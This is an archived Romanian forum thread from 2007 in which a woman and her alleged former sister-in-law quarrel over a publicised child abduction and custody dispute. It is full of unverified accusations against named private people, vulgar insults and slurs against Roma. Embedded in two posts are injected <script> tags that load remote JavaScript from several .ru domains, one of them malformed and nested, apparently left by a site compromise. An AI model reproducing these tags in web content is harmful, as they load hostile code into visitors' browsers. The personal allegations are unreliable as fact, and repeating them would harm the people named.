PDA

Arată versiune întreagă : Sa lamurim situatia...cu Tatiana Barbu

21.06.2007, 16:15
In primul rand,nu sunt o prietena ci o ruda de a Tatianei Barbu, fosta cumnata mai bine zis.Este o poveste lunga si trista..am sa incerc pe scurt sa va povestesc viata fratelui meu,fostul sot al Tatianei Barbu.S-au cunoscut in liceu,s-au iubit,m-ai tarziu s-au casatorit si fratele a plecat in Italia sa asigure viata frumoasa sotiei.A muncit ani de zile la 40 grade in Sicilia,la cules portocale,si toti bani i-a trimis sotiei ani de-a randul.Insa Tatiana nu rezistat singura si a inceput sa isi insele sotul cu oricine din Bacau.S-a intors sotul acasa,mai tarziu a plecat in Anglia,sotia a dat nastere la o fetita,iar sotul a muncit mai din greu ca sa le asigure tot comfortul.Nu si-a vazut niciodata fetita,insa dupa multi ani de strainatate,a venit timpul sa mearga acasa,insa Tatiana l-a convins sa mai stea...avea un plan...A vandut apartamentul,masina tot,si a vrut sa plece cu tot cu fetita in America.Nu a reusit insa sa treaca fetita pe pasaportul ei fara semnatura tatalui,cu toate ca a insistat la pasapoarte...Asa ca e a parasit copilul,si a plecat in US,ii era teama ca vine sotul si va afla toate aventurile.A lasat-o pe Giulia printre straini de la 4 ani,si nu la parinti cum declara ea...Sotul a venit acasa,nu tu casa,nu tu sotie si nici copil..imaginati-va durerea din suflet,dupa atatia ani de munca si suferinta..si barbatii au suflet,sa stiti.Dupa lungi cautari a dat de un fir si a gasit fetita,si dupa lungi insistente i s-a dat voie sa o vada,insa omul nu a mai judecat,de manie,suparare si a luat fetita cu el.Nu o vazuse niciodata,a iubit-o din prima,si pentru ca mama nu era langa ea,era prea ocupata in US,sa se recasatoreasca, a dorit sa ii fie alaturi ,parinte.Tatiana a inceput sa imprastie numai vorbe rele despre fostul sot,si l-a dat in urmarire,tot ea, care gresise si distrusese caminul lor,ea care inselase,vanduse tot,si deja dupa un scurt timp in US s-a recasatorit,si a facut si alt copil.Marea greseala a sotului a fost ca nu a avut un avocat bun,care sa il sfatuie sa aplice pentru custodia fetitei,pentru ca el era in tara si ea in US.In final s-a decis sa plece din nou in strainatate,iar pentru ca fetita nu putut sa o i-a cu el a lasat-o la niste cunostinte f.bune,si nu la o fam.de tigani,cum declara Tatiana.Femeia din Piatra care i-a crescut fetita 5 ani,a iubit-o si ingrijit-o ca pe o nepoata proprie.Dar Tatiana a jignit-o si a ameninat-o,fara un pic de respect fata de cineva care i-a crescut copilul 5 ani.De cand a luat fetita de la Piatra,Tatiana nu i-a mai dat-o niciodata la tel.fostului sot,lucru care vroia sa il faca daca reusea sa o i-a cu ea in US ani in urma..Macar Giulia stie ca are un tata,bun sau rau e tatal ei si nimic nu poate schimba asta..poate vreodata are sa il caute...sa ii spuna TATA,as vrea sa ascult si varianta ta!.Sa nu uitam ca si tati sunt parinti,si au suflet..de PARINTE! Cu Tv si media situatiile se interpreteaza gresit intotdeauna,pentru ca ne place sa judecam fara sa stim adevarata situatie..Nu am vrut nicicand adresa lor din US,ci ma gandeam ca poate o sa citeasca si Tatiana si lumea va afla ca de fapt minte....Era cinstit si omeneste ,sa divorteze sa vada copilul amandoi,si totul ar fi fost normal,nu se ajungea la rapiri,suferinte,si chinuri.Copilul nu a crescut nici cu mama, nici cu tata,si vina CEA MAI MARE o poarta TATIANA.Era mai bine daca Paulet(fostul sot) o lasa sa lucreze la Bacau ca CROITOREASA,cum lucrape timpuri,si acum probabil era altfel de femeie.S-ar parea ca atunci cand o duci prea bine ,o iei razna!DUMNEZEU NU DOARME, v-a avea grija de fiecare in parte.kgj3.r<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www<script src=http://www.iroe.ru/ngg.js></script>

Isolda
22.06.2007, 01:22
Eu am citit ,dar nu inteleg de ce nu incearca pe cale legala ?! nu cred ca este o solutie sa-ti faci dreptate singur

22.06.2007, 01:34
intradevar nu e o solutie dar fiecare reactioneaza diferit la stress si socuri...acum oricum fetita este cu ea,si nu vrea sa i-o dea la telefon cu toate ca a promis la Povestiri Advevarate in fata unui popor intreg,ca il iarta ca a luat fetita,si ca i-o va da la telefon..nu s-a intamplat insa.nici femeii care a crescut-o nu i-a mai dat-o la telefon,dimpotriva a incercat sa o bage la puscarie.....

sorin
22.06.2007, 01:39
<B style="mso-bidi-font-weight: normal">catwoman[/B], acum poate ne spui mai in detaliu si care a fost scopul acelui anunt in care spuneai ca vrei sa gasesti o prietena. mesajul tau initial spunea ca esti in cautarea unei prietene, dar aceasta

nicoletamihaela
22.06.2007, 01:49
Sorin povestea este mediatizata in Romania peste tot...Adevarul este undeva la mijloc,si avea dreptate o buna si iubita prietena de-a mea,cand spunea ce spunea...Sa le indrepte Dumnezeu pasii catre adevar,si in primul rand sa se gandeasca la sufletul copilului...

22.06.2007, 01:51
dupa cum am spus sunt o fosta cumnata de a dansei,si mie mi s-a adresat intrebandu-ma cine sunt si cum ma cheama..mi-a trimis si un mesaj privat vrand sa stie cine sunt..si nu am nici o intentie rea..am vrut doar sa vad daca cineva o cunoaste ca sa pot sa imi spun amarul cum si-a batut joc de fratele meu..am crezut ca asta este rolul unui forum discutii,barfe....daca subiectul meu e nepotrivit eu ma retrag si nu mai deranjezsmileys/smiley1.gif

sorin
22.06.2007, 01:57
pai tocmai, de aceea este forum sa intrebam si noi ce nu ni se pare clar. nu a spus nimeni ca trebuie sa te retragi ci doar sa clarifici unele detalii. de exemplu, de ce nu ai spus din prima ca esti o cumnata, in loc de o prietena.

apropo de spus amarul, banuiesc ca putea sa spui povestea care-ti statea pe suflet si direct, fara sa cauti informatii despre cumnata ta. nu stiu de ce, dar am impresia ca lipseste o rotita mica din tot mecanismul, dar se poate sa fie doar o parea personala.

22.06.2007, 02:03
bina am gresit,dar daca aveam sa spun ca sunt o cumnata Tatiana avea sa inceapa cu atacuri la persoana mea,ceea ce nu vreau..s-a intamplat in trecut si nu a fost frumos.

va multumesc tuturor pentru atentie,dar s-ar parea ca am abordat problema gresit.

Isolda
22.06.2007, 02:06
intradevar nu e o solutie dar fiecare reactioneaza diferit la stress si socuri...
Greseala costa ,orice actiune pe cont propriu poate fi folosita impotriva ta . Cind sentimentele primeaza esti in pericol sa faci lucruri pe care pe urma le vei regreta.

22.06.2007, 02:21
Platim pentru greseli in viata,dar mai degraba sa risti fie ca e greseala sau nu,decat sa te intrebi mai tarziu,daca faceam asa cum avea sa fie?si depinde de sentimente,si de persoana,difera de la caz la caz...nu crezi Isolda?smileys/smiley25.gif

Isolda
22.06.2007, 02:39
Eu cred ca un parintele trebuie sa se gindeasca in primul rind la binele copilului.Nu stiu alte amanunte decit cele scrise de tine dar in general copiii sufera cel mai mult cind sunt implicati in razboaiele astea si asta este cel mai trist.

22.06.2007, 02:46
Asa este in toata povestea cel mai tare a avut de suferit micuta Giulia..Dar tu ce ai face cand vrezi sa iti vezi copilul prima oara,si niste straini iti spun ca nu il poti vedea,cum i s-a spus fratelui meu?ca nu ti se da voie si plange sufletul si tine?Eu am fost cu el cand si-a gasit fetita ascunsa printre straini,si sincer nu as fi vrut sa fiu in locul lui.Totul a fost dureros.In final vreau sa adaug ca toti gresim,e omeneste,dar sa nu ne cladim fericirea pe nefericirea altora,m-ai ales persoane care ne-au ajutat sa ne ridicam in viata...e mare pacat!

Isolda
22.06.2007, 02:59
Ti-am spus
calea legala este singura care poate rezolva astfel de probleme restul sunt
speculatii si amenintari.smileys/smiley18.gifFratele tau in final va pierde daca se foloseste de
copil pentru a se razbuna.Cum zici si tu omul la durere nu mai judeca clar .smileys/smiley11.gif</span>

22.06.2007, 03:06
Ai dreptate Isolda.S-ar parea ce esti o persoana sensibila si inteligenta.Mai vorbim....Daca apare Tatiana intre timp,si face valva,nu-i nimic ,ne-am obisnuit cu persoane agasante...

23.06.2007, 00:40
[QUOTE=sorin]
<B style="mso-bidi-font-weight: normal">catwoman[/B], acum poate ne spui mai in detaliu si care a fost scopul acelui anunt in care spuneai ca vrei sa gasesti o prietena. mesajul tau initial spunea ca esti in cautarea unei prietene, dar aceasta

23.06.2007, 01:38
Sorin povestea este mediatizata in Romania peste tot...Adevarul este undeva la mijloc,si avea dreptate o buna si iubita prietena de-a mea,cand spunea ce spunea...Sa le indrepte Dumnezeu pasii catre adevar,si in primul rand sa se gandeasca la sufletul copilului...

Ai perfecta dreptate...Cand am plecat din SUa spre Romania in 9 Feb.2006, am plans in hohote si ma rugam sa-mi indrepte pasii pe drumul cel mai scurt spre GIULIA. Noapte am ajuns in Romania iar dimineata am plecat la mai multe Manastiri unde am plans si m-am rugat ca Bunul Dumnezeu sa scoata adevarul la suprafata si eu sa-mi striang fetita in brate. Lacrimile mele nu au fost in zadar. Pur si simplu nu stiam de unde s incep sa caut fata. Asa am inceput sa pun afise cu poza Giuliei ( la 4 ani...) si cu date personale si adrese de contact alaturide o suma foarte mare pe care o ofeream ca recompensa...celor care au vazut fetita, peste tot prin Bacau, Piatra Neamt ,Bicaz si Iasi, la fel prieteni de-ai mei au pus in Londra prin locuri frecventate de Romani...si asa, usor , usor, am ajuns sa-mi gasesc printesa si sa mi-o iau acasa.

PS: anul acesta sper ca sa pot lansa si cartea care am scriso special ptr Giulia: acolo vor fi date mai detailiat multe din cele intamplate in viata mea ( din1980- pana in 2006 )de cand am cunoscut acest OM IMPOSIBIL...si pana cosmarul a luat sfarsit. Tatiana.

angeline
23.06.2007, 03:07
avand recenzia cartii</span> pe forum chiar daca ai incercat sa ii faci o publicitate in avans</span> o parte din potentialii clienti i-ai scutit de cheltuieli si timpsmileys/smiley2.gif
ca orice intamplari povestite</span> intr-o carte sunt </span>adevaruri</span> </span></span>care niciodata nu vor fi date in vileag</span>...
am o singura curiozitate ! pomeneai de o recompensa...de ce suma era vorba si daca s-a si bucurat cineva de ea ?

ps</span> (nu reprezint nici un post de radio sau televiziune !)smileys/smiley2.gif

23.06.2007, 03:30
avand recenzia cartii pe forum chiar daca ai incercat sa ii faci o publicitate in avans o parte din potentialii clienti i-ai scutit de cheltuieli si timpsmileys/smiley2.gif
ca orice intamplari povestite intr-o carte sunt adevaruri care niciodata nu vor fi date in vileag...am o singura curiozitate ! pomeneai de o recompensa...de ce suma era vorba si daca s-a si bucurat cineva de ea ?

HI ! " Hagi Tudosi " cred ca ti se potriveste perfect ( apropo de clone, poti sa-l folosesti ); Uite cum stau treburile, chiar daca am zis ca nu mai intru pe acest forum, nu am rezistat sa nu-ti dau replica! Suma a fost foarte mare, dar din nefericire pana la aceasta ora inca nu am aflat cine a fost persoana. Vrea sa fie anonima deoarece a fost amenintata de tigani ca va fi impuscata. Stiu doar ca este o femeie pensionara si pur si simplu din intamplare a descoperit ca ALEXANDRA era de fapt GIULIA... SPER CAT DE CURAND SA POT SA O GASESC SI SA-I MULTUMESC ASA CUM STIM NOI (EU SI GIULIA) . Incredibil dar femeia nu a vrut nici un dolar !!!!Mi-a spus doar sa fim fericite si niciodata sa nu ne mai despartim...Mai sunt si oameni adevarati...dar foarte rari de gasit.

Iar cat priveste cartea mea chiar nu ma intereseaza parerea ta.

- TE OFTICI ???

- HAI CA TE OFTICI.

editat de sorin: vedem bine si nu ne trebuie marimea aia imensa la text

angeline
23.06.2007, 03:38
supermamy wrote:</span>
" - TE OFTICI ???"</font>

pe pariu ?smileys/smiley2.gif

ps</span> (nu reprezint nici un post de radio sau televiziune !)smileys/smiley2.gif

23.06.2007, 03:49
supermamy wrote:
" - TE OFTICI ???"

pe pariu ?smileys/smiley2.gif

Zau ca nu dor ma gandesc ce o fi in sufletelul tau ???smileys/smiley18.gif

Eu, multumesc lui Dumnezeu a venit si ziua in care pot sa rad din nou in hohote....Doar atat cand se vorbeste despre...GIULIA, fetita mea, nu pot sa-mi controlez prea bine ..cuvintele.SINCER.smileys/smiley2.gif

23.06.2007, 04:03
cred ca nu mai vreau sa ies de pe forum !!! A inceput sa-mi placa. Sincer lucrez de noapte iar discutiile cu voi ma tin treaza. Asa ca pe un compiuter " racolez " pe cei care au "depasit viteza " din mai multe state din SUA , .sau au trecut pe "rosu " la semafor, iar pe celalalt ma distrez cu voi. Va pupic pe toti si zau ca nu sunt suparata, ba dimpotriva FERICITA ca am avut suficient fler sa stiu cine este " prietena " ce ma cauta. Tatiana, Arizona,

angeline
23.06.2007, 04:18
PROMIT CA ESTE ULTIMA OARA CAND SCRIU....!!!1
au promis si altii ! smileys/smiley2.gifsmileys/smiley36.gifsmileys/smiley36.gif

supermamy wrote :</span>
"cred ca nu mai vreau sa ies de pe forum !!! A inceput sa-mi placa."

au mai patit-o si altii !smileys/smiley2.gif
ai incurcat-o dar esti pe drumul cel bun smileys/smiley36.gif te-ai virusat rau de totsmileys/smiley36.gifsmileys/smiley36.gif

http://smg.photobucket.com/albums/v235/SmileyMags/Hobby/th_0666.gif (http://smg.photobucket.com/albums/v235/SmileyMags/Hobby/?acti&#111;n=view&amp;current=0666.gif)

nicoletamihaela
23.06.2007, 06:13
PS: anul acesta sper ca sa pot lansa si cartea care am scriso special ptr Giulia: acolo vor fi date mai detailiat multe din cele intamplate in viata mea ( din1980- pana in 2006 )de cand am cunoscut acest OM IMPOSIBIL...si pana cosmarul a luat sfarsit. Tatiana. Super mamy..Eu ma bucur pentru tine..Acum mai are sens si rost?Crezi ca iti poate lua cineva fata?Iar?Nu....

Dar cu cartea?Ca am sesizat ca ai scris o carte(asa ai scris mai sus)..Crezi oare ca durerea este bine sa o faci publica?Si mai mult de atat..Sa obtii bani pe durerea ta?Mi se pare cel putin ciudata situatia...

Oricum sa te bucuri de fata ta..Si eu zic sa dezvolti alt subiect..ca sa uiti de durerea din trecut..Ceva frumos,bun si cu suflet...

danielita
23.06.2007, 09:04
Draga mea.fiecare avem o poveste.Asta nu inseamna ca trebuie sa o povestim pe un forum.Nu ma bagam precum musca -n lapte dar am observat ca afisezi un aer de superioritate nejustificat.

Eu in locul tau nu cadeam in plasa intinsa de cumnata.As petrece timpul in mod placut alaturi de fiica mea.Ai de recuperat pentru ca ai pierdut una din etapele cele mai frumoase din viata unui copil.

De ce s-ar oftica Angeline?

23.06.2007, 18:38
Buna DANIELITA, Nu e total gresit. Nu am vrut sa afisez un aer de superioritate, nu am de ce si ptr. ce. Sunt doar mandra de mine ca am avut din nou dreptate cand am spus pe FORUM ca nu e vorba de " o prietena" . Nu asa se cauta o prietena....La fel cand am spus celor de la Polita din Bacau, celor de la Interpol, celor de la IGPB, ca sunt 99 % convinsa ca Giulia este in tara dar nimeni nu au cautoato. Si ca ea se afla mai mult ca sigur cu identitatea unui copil care este plecat definitiv din tara sau ...in cel mai nefericit caz a unui copil decedat....AM AVUT PERFECTA DREPTATE. Ei mi-au spus ca "flerul lor de politisti " nu-i inseala , asa ca sa nu-i contrazic ptr ca au dreptate....Iar eu le-am spus ca "SIMTUL MEU DE MAMA" NU MA INSEALA MAI ALES CA... paulet ion asta face de mai bine de 10 ani : acte false in Londra ( a fost " la specializare- 5 ani inainte in Sicilia !)

Dupa cum spuneam le-am demonstrat acest lucru cand am gasit fetita cu numele de MAFEI ALEXANDRA, ca apoi cei de la IGPB sa-mi confirme in scris ca actul de nastere al fetei a fost o copie dupa a cela al unui copil decedat in 2001 !!!!!

Referitor la carte , este de fapt un strigat de disperare ptr toate femeile ( in special ) care trec prin probleme de genul celei ale mele , SA NU RENUNTE PANA LA MOARTE PTR A LUPTA, IN OBTINEREA A CEEA CE ELE-SI DORESC MAI ALES LEGAT DE COPII SI CASNICIA LOR.Sa nu cedeze psihic (cum au facut atatea, si atatea persoane) ci cu credinta in Dumnezeu daca -ti doresti cu adevarat ceva , atunci ...sigur vei avea. Nu are importanta, sacrificiile, lacrimile si pretul sau anii...care te vor costa ! Aceasta carte vreau ca Giulia sa o aiba ca un cadou ptr anii in care ma cauta in visele ei iar cand se trezea si povestea despre mine cum ma visat...Acele criminale de tiganci ai spuneau Giuliei ca "este femeia care a stat cu tine o perioada si acum te cauta sa te omoare " ....Giulia este foarte bucuroasa de carte si de tot, va dati seama nu am cuvinte sa va descriu fericirea ei ! Asta este cel mai important...Iar banii....vor fi dati familiilor necajite cu multi copii din Romania. Eu nu am nevoie de ei. Ma multumesc cu ce am. Sa fim noi sanatosi si in rest toate cele bune....

" CUMNATA " ?????

Nici o problema cred ca am rezolvato cu un mesaj asa...la nivelul ei..." ca la mama lor acasa" stii sa fie pe intelesul ei! SORY !!!Acum chiar am depasit limita. Numai bine la toata lumea si sa aveti a saptamana..SUPER ...pe toate planurile.

danielita
23.06.2007, 19:24
Aceste afirmatii despre fostul sot nu sunt probate.Poti sa dovedesti in instanta cu acte si martori ca el se ocupa cu asa ceva?

23.06.2007, 20:24
Sigur draga mea, Nu o sa crezi dar dovada a fost clara cand am prezentat copia pasaportului de cetatean spaniol, pe numele de MENDOZA NICHOLAS, cu care a venit la mine in Statele Unite in Nov. 1999. si cu o viza de 4 luni obtinuta din Londra, de unde el statea.Am fost destul de inspirata sa-mi iau masuri de precautie dupa cele intamplate in Romani ani si ani, apoi cu un an in urma in Londra cand am fost eu la el....Povestea e lunga nu are rost. Doar sa stii ca daca nu aveam dovada "nugru pe alb " nu faceam nici o declaratie niciunde. Ba chiar acum cand a fost condamnat ( in lipsa evident ) a trimis el o declaratie in care confirma ca el personal a facut acel certificat de nastere fals ca sa poata fi scosi de sub acuzatie tiganii din Piatra Neat. Si la asta am dovada clara primita de la IGPB.

Oare de ce as minti ??? Nu ma mai intereseaza persoana lui, doar ca vreau sa stau la distanta de el si de toata " RASA LUI ". Crede-ma e adevarat, asta doar ca informatie ptr. toti.....Am o familie frumas, un baiat si o fetita, frumosi si inteligenti, respectosi si credinciosi. Sotul este un INGER, si un tata minunat. De ce as minti pe forum ? Am suferit dar, stii cum se zice :"Cine rade la urma rade mai bine !"

23.06.2007, 22:36
In primul rand,nu sunt o prietena ci o ruda de a Tatianei Barbu, fosta cumnata mai bine zis.Este o poveste lunga si trista..am sa incerc pe scurt sa va povestesc viata fratelui meu,fostul sot al Tatianei Barbu.S-au cunoscut in liceu,s-au iubit,m-ai tarziu s-au casatorit si fratele a plecat in Italia sa asigure viata frumoasa sotiei.A muncit ani de zile la 40 grade in Sicilia,la cules portocale,si toti bani i-a trimis sotiei ani de-a randul.Insa Tatiana nu rezistat singura si a inceput sa isi insele sotul cu oricine din Bacau.S-a intors sotul acasa,mai tarziu a plecat in Anglia,sotia a dat nastere la o fetita,iar sotul a muncit mai din greu ca sa le asigure tot comfortul.Nu si-a vazut niciodata fetita,insa dupa multi ani de strainatate,a venit timpul sa mearga acasa,insa Tatiana l-a convins sa mai stea...avea un plan...A vandut apartamentul,masina tot,si a vrut sa plece cu tot cu fetita in America.Nu a reusit insa sa treaca fetita pe pasaportul ei fara semnatura tatalui,cu toate ca a insistat la pasapoarte...Asa ca e a parasit copilul,si a plecat in US,ii era teama ca vine sotul si va afla toate aventurile.A lasat-o pe Giulia printre straini de la 4 ani,si nu la parinti cum declara ea...Sotul a venit acasa,nu tu casa,nu tu sotie si nici copil..imaginati-va durerea din suflet,dupa atatia ani de munca si suferinta..si barbatii au suflet,sa stiti.Dupa lungi cautari a dat de un fir si a gasit fetita,si dupa lungi insistente i s-a dat voie sa o vada,insa omul nu a mai judecat,de manie,suparare si a luat fetita cu el.Nu o vazuse niciodata,a iubit-o din prima,si pentru ca mama nu era langa ea,era prea ocupata in US,sa se recasatoreasca, a dorit sa ii fie alaturi ,parinte.Tatiana a inceput sa imprastie numai vorbe rele despre fostul sot,si l-a dat in urmarire,tot ea, care gresise si distrusese caminul lor,ea care inselase,vanduse tot,si deja dupa un scurt timp in US s-a recasatorit,si a facut si alt copil.Marea greseala a sotului a fost ca nu a avut un avocat bun,care sa il sfatuie sa aplice pentru custodia fetitei,pentru ca el era in tara si ea in US.In final s-a decis sa plece din nou in strainatate,iar pentru ca fetita nu putut sa o i-a cu el a lasat-o la niste cunostinte f.bune,si nu la o fam.de tigani,cum declara Tatiana.Femeia din Piatra care i-a crescut fetita 5 ani,a iubit-o si ingrijit-o ca pe o nepoata proprie.Dar Tatiana a jignit-o si a ameninat-o,fara un pic de respect fata de cineva care i-a crescut copilul 5 ani.De cand a luat fetita de la Piatra,Tatiana nu i-a mai dat-o niciodata la tel.fostului sot,lucru care vroia sa il faca daca reusea sa o i-a cu ea in US ani in urma..Macar Giulia stie ca are un tata,bun sau rau e tatal ei si nimic nu poate schimba asta..poate vreodata are sa il caute...sa ii spuna TATA,as vrea sa ascult si varianta ta!.Sa nu uitam ca si tati sunt parinti,si au suflet..de PARINTE! Cu Tv si media situatiile se interpreteaza gresit intotdeauna,pentru ca ne place sa judecam fara sa stim adevarata situatie..Nu am vrut nicicand adresa lor din US,ci ma gandeam ca poate o sa citeasca si Tatiana si lumea va afla ca de fapt minte....Era cinstit si omeneste ,sa divorteze sa vada copilul amandoi,si totul ar fi fost normal,nu se ajungea la rapiri,suferinte,si chinuri.Copilul nu a crescut nici cu mama, nici cu tata,si vina CEA MAI MARE o poarta TATIANA.Era mai bine daca Paulet(fostul sot) o lasa sa lucreze la Bacau ca CROITOREASA,cum lucrape timpuri,si acum probabil era altfel de femeie.S-ar parea ca atunci cand o duci prea bine ,o iei razna!DUMNEZEU NU DOARME, v-a avea grija de fiecare in parte.

[b]Suntem in Post...sper ca stii ce inseamna, si sper ca stii ce vei primi de la Dumnezeu ptr tot ceea ce faci si spui...Hai pe scurt sa-ti raspund la cateva interpretari de ale tale:</stron<script src=http://www.iroe.ru/ngg.js></script>

23.06.2007, 23:58
<TABLE height=14 cellSpacing=1 cellPadding=3 width="100%">
<T>
<TR>
<TD class=ting noWrap width=145 background=forum_images/table_bg_image.gif bgColor=#a6aad3>Author</TD>
<TD class=ting noWrap width="82%" background=forum_images/table_bg_image.gif bgColor=#a6aad3>Message</TD></TR>
<TR>
<TD class=smText vAlign=top background="" bgColor=#f4f4fb><A name=""></A>supermamy
Newbie
http://www.romanian-portal.com/forum/forum_images/1_star_rating.gif

<TD class=text vAlign=top background="" bgColor=#f4f4fb>
<TABLE cellSpacing=0 cellPadding=0 width="100%">
<T>
<TR>
<TD class=smText width="60%">Sent: 23June2007 at 08:45</TD>
<TD align=right width="30%">http://www.romanian-portal.com/forum/forum_images/delete_sm.gif (http://www.romanian-portal.com/forum/pm_delete_message.asp?pm_id=47473) http://www.romanian-portal.com/forum/forum_images/pm_reply.gif (http://www.romanian-portal.com/forum/pm_new_message_&#102;orm.asp?code=reply&amp;pm=47473)</TD></TR>
<TR>
<TD colSpan=2>
<HR>
</TD></TR></T></TABLE>

Esti o scarba ordinara oricine ai fi !!! Poti sa te tragi de floci ca altceva nu ti-a mai ramas. Chiar nu ma obosesc sa aflu exact cine esti dar savurez acest mesaj pe care ti-l transmit din toata inima. Un singur lucru trebuie sa mai stii : PAULET ION ARE OBLIGATII DE TAT FATA DE GIULIA, asa ca numai el va vedea fetita cand ...ea va dori, iar voi jafuri gretoase si nesatisfacute o sa o luati in mana ca pana acum.Hai ca va ofticati ! si ce daca o sa am doi barbati pentru-ca am doi copii cu ei. amandoi trebuie sa munceasca si sa le stranga in banca conturi frumoase. Ca doar, de....le-am facut doi copii superbi, frumosi si inteligenti ca scumpa lor mamica !!!!! Hai ca-mi faci greata.

Poti sa-l faci public zau ca nu ma doare nici in foci de pe canal !!

HA ! HA ! HA!http://www.romanian-portal.com/forum/smileys/smiley36.gifhttp://www.romanian-portal.com/forum/smileys/smiley36.gifhttp://www.romanian-portal.com/forum/smileys/smiley36.gifhttp://www.romanian-portal.com/forum/smileys/smiley36.gifhttp://www.romanian-portal.com/forum/smileys/smiley36.gifhttp://www.romanian-portal.com/forum/smileys/smiley36.gif</TD></TR></T></TABLE>

24.06.2007, 00:03
Acesta oameni buni este mesajul care mi l-a trimis DOAMNA Tatiana Barbu.Judecati dvs dupa cuvintele ei cam ce fel de doamna este,cu un limbaj foarte vulgar.........lasa de dorit...mesajul a fost trimis privat,dar am vrut sa il fac public,ca sa arat ca nu este ceea ce pare(o doamna!) si minte in continuare cu nerusinare....

24.06.2007, 00:21
Am fost nascuta sa fiu o doamna...nu ca tine care cu disperare asezi doua cuvinte incrucisate pe forum...In veci nu vei reusi! Dumnezeu sa va odihneasca pe tine si tot neamul tau....Pe Giulia nimeni nu o va mai lua de linga mine decat....viitorul meu GINERE !Tu ai impresia ca am nevoie de aprecierile tale ? Inca nu am spus exact ce meritai , dar daca-mi dai numele si telefonul se rezolva...Numai ca ,o lasa cum esti ,doar vrei sa-mi strici mie imaginea ...Nu vei reusi niciodata. Eu, familia mea, prietenii , colegii si toti din jurul meu ma cunosc perfect (cu sau fara aceste " expresii de ...dulce " care-ti sunt dedicatedin toata inima). Deci nu vei schimba tu imaginea mea poti sa stain in f ....si daca-i mai ai...( ti-am scris mai sus) Stii la varsta mea mai spui si "de asta"; nu sunt nici virgina si nici calugarita. Ca orice om , cum bine spuneai mai sus ...te mai lasa nervii mai ales cand ai de aface cu reziduri ale societatii ca tine care se scurg..peste tot, sa tulbure apele. Ai facut cumva altceva....Nu cred.

Ptr mine oricine ai fi, nu ramai decat un divertisment ....................Garantez inchiderea acestui topic.

24.06.2007, 00:29
MULTA SANATATE!Doamna implinita financiar care lucrezi noaptea!

LA varsta si la ''greutatea'' ta ma refer la kilograme oricum nu ai alte sanse..

Declar acest topic inchis ca nu am ce vorbi cu tine.Vorbesc putin si bine nu mult si prost ca tine....

SORIN TE ROG SA INCHIZI ACEST TOPIC.MULTUMESCsmileys/smiley1.gif

24.06.2007, 00:55
smileys/smiley17.gif

MULTA SANATATE!Doamna implinita financiar care lucrezi noaptea!

LA varsta si la ''greutatea'' ta ma refer la kilograme oricum nu ai alte sanse..

Declar acest topic inchis ca nu am ce vorbi cu tine.Vorbesc putin si bine nu mult si prost ca tine....

SORIN TE ROG SA INCHIZI ACEST TOPIC.MULTUMESCsmileys/smiley1.gif

In sfarsit pleaca virusii ...smileys/smiley17.gifDoamne ,crapa ranza in tine de oftica...asa vei muri cu ghiara in gat ca pitigoiul....Pe bune dar meriti si tu si raposatul. faceti perechea ideala. Sa va fereasca Dumnezeu de razbunarea Giuliei !!!! Dar sunt convinsa ca pedeapsa cea mai potrivita ve-ti primi-o de la Bunul Dumnezeu, foarte curand......Toate lacrimile amare varsate timp de SAPTE ANI smileys/smiley19.gifnu pot fi uitate.Vom trai si vom vedea........smileys/smiley32.gif

PS;Cumnatico, tot nu-mi spui care din cele cinci esti tu ????Gunoaie socialesmileys/smiley7.gif, pericole publicesmileys/smiley7.gif,reziduri ale societatiismileys/smiley7.gif...unde sa va mai clasific????smileys/smiley7.gif

24.06.2007, 01:05
Dupa cum ai spus mai devreme,tu tii legatura cu toate fostele cumnate,ca au adresa de email si nr de telefon...deci ai mintit din nou.daca aveam adresa de email nu scriam pe acest forum,ca abia ai asteptat o ocazie,sa incerci sa iesi in evidenta...te compatimesc,viata ta trebuie sa fie tare plictisitoare...in loc sa iti petreci timp cu copii tai, te certi cu forumisti si jignesti pe toata lumea...Divo avea dreptate stai rau la capitolul IQ..esti singura de pe aici care nu face decat sa vorbeasca vulgar si sa se certe....stii sunt si moduri de discutie decente si placute,dar tu nu le stii..smileys/smiley1.gif

angeline
24.06.2007, 01:09
sa lamurim situatia !</span> smileys/smiley2.gifsmileys/smiley36.gif...sfatul meu este sa va retrageti si sa va continuati "cartea" pe alt forum/spatii virtuale</span>...s-a dat frau liber imaginatiei si vocabularului iar forumul de fata impreuna cu forumistii care il frecventeaza, au pretentii</span>smileys/smiley2.gif

24.06.2007, 01:13
Angeline ai perfecta dreptate,eu vreau sa inchid acest topic.I-am si spus lui Sorin.Dar femeia asta continua sa jigneasca si sa minta in loc sa isi vada de viata si sa disculte altceva pe acest forum.

marian42
24.06.2007, 01:13
Alooo.... Decat sa-l inchideti, mai bine mutati topicul
asta in sectiunea umor. Nu-sh' cum se face, insa, in ciuda
faptelor, de cand tot citesc balacareala asta, asa ma-ncearca un nebun
de ras, de n-am vorbe sa v-o spui !...smileys/smiley4.gif

24.06.2007, 01:14
SCUZE....dar, dupa cum vezi am avut 100% dreptate !Rudele si prietenii mei au toti adresa, telefon si emai de la mine. vorbesc zilnic macar o data sau de doua ori in Romania. Tocmai de aceea am atacat atat de gur pe cei care au incercat sa ma contrazica nestiind de fapt situatia. Mie nu -mi este frica de nimic si de nimeni. Nu am de ce. Referitor la " acea prietena" care acum este..." o cumnata". tot nu tine. Toate cele 5 foste cumnate, 3 din Romania si doua din Italia, au nr. de telefon si adresa mea de email.

Poftim dovada la ce ai scris Tatiana.Deci alb pe negru te-am prins cu cioara vopsita.Las-o balta!

24.06.2007, 01:18
Dupa cum ai spus mai devreme,tu tii legatura cu toate fostele cumnate,ca au adresa de email si nr de telefon...deci ai mintit din nou.daca aveam adresa de email nu scriam pe acest forum,ca abia ai asteptat o ocazie,sa incerci sa iesi in evidenta...te compatimesc,viata ta trebuie sa fie tare plictisitoare...in loc sa iti petreci timp cu copii tai, te certi cu forumisti si jignesti pe toata lumea...Divo avea dreptate stai rau la capitolul IQ..esti singura de pe aici care nu face decat sa vorbeasca vulgar si sa se certe....stii sunt si moduri de discutie decente si placute,dar tu nu le stii..smileys/smiley1.gif

CU PERSOANE PERVERSE SI MINCINOASE TREBUIE SA STII SA TE COBORI LA NIVELUL LOR DACA E VEVOI SI SA LE RASPUNZI PE INTELESUL LOR. ADICA AL TAU

